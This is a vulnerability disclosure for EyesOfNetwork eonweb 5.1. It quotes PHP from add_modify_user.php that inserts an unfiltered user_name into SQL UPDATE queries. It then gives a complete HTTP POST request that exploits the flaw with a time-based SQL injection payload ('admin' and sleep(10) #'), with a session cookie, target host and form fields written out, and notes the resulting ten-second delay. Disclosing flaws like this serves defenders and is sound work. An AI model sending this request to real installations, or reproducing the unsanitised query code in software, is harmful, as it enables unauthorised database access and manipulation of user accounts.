module_admin_user_add_modify_user.php

powered by minhaizhao from Anyuntec

version: 5.1

https://github.com/EyesOfNetworkCommunity/eonweb

Vulnerability details

0x01

/srv/eyesofnetwork/eonweb-5.1/module/admin_user/add_modify_user.php Line 114

if (($user_name != "") && ($user_name != null) && ($user_id != null) && ($user_id != "") && ($user_exist == 0)) {
                if (($user_password1 != "") && ($user_password1 != null) && ($user_password1 == $user_password2)) {

                    $eonweb_groupname=mysqli_result(sqlrequest("$database_eonweb","SELECT group_name FROM groups WHERE group_id='$user_group'"),0,"group_name");            
                    $eonweb_oldgroupname=mysqli_result(sqlrequest("$database_eonweb","SELECT group_name FROM groups WHERE group_id='$old_group_id'"),0,"group_name");           
                    if ($user_password1 != "abcdefghijklmnopqrstuvwxyz") {
                        $passwd_temp = md5($user_password1);
                        // Update into eonweb
                        sqlrequest("$database_eonweb","UPDATE users set user_name='$user_name', user_descr='$user_descr',group_id='$user_group',user_passwd='$passwd_temp',user_type='$user_type',user_location='$user_location',user_limitation='$user_limitation',user_language='$user_language' WHERE user_id ='$user_id'");
                    }
                    else {
                        // Update into eonweb
                        

$user_name has not been filtered to cause injection

/srv/eyesofnetwork/eonweb-5.1/module/admin_user/add_modify_user.php Line 300

if (isset($_POST['update'])){
                update_user($user_id, stripAccents($user_name), $user_descr, $user_group, $user_password1, $user_password2, $user_type, $user_location, $user_mail, $user_limitation, $old_group_id, $old_name, $create_user_in_nagvis, $create_user_in_cacti, $nagvis_role_id, $user_language);    
            }

EXP:

POST /module/admin_user/add_modify_user.php HTTP/1.1
Host: 192.168.91.66
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 285
Referer: https://192.168.91.66/module/admin_user/add_modify_user.php?user_id=1
Cookie: session_id=654387568; user_name=admin; user_id=1; user_limitation=0; group_id=1
X-Forwarded-For: 127.0.0.1
Connection: close
Upgrade-Insecure-Requests: 1

user_id=1&user_name=admin%27+and+sleep%2810%29+%23&user_name_old=admin&user_type=0&user_group=1&create_user_in_nagvis=yes&nagvis_group=1&user_mail=&user_descr=default+user&user_password1=abcdefghijklmnopqrstuvwxyz&user_password2=abcdefghijklmnopqrstuvwxyz&user_language=0&update=update

The page will be delayed for 10 seconds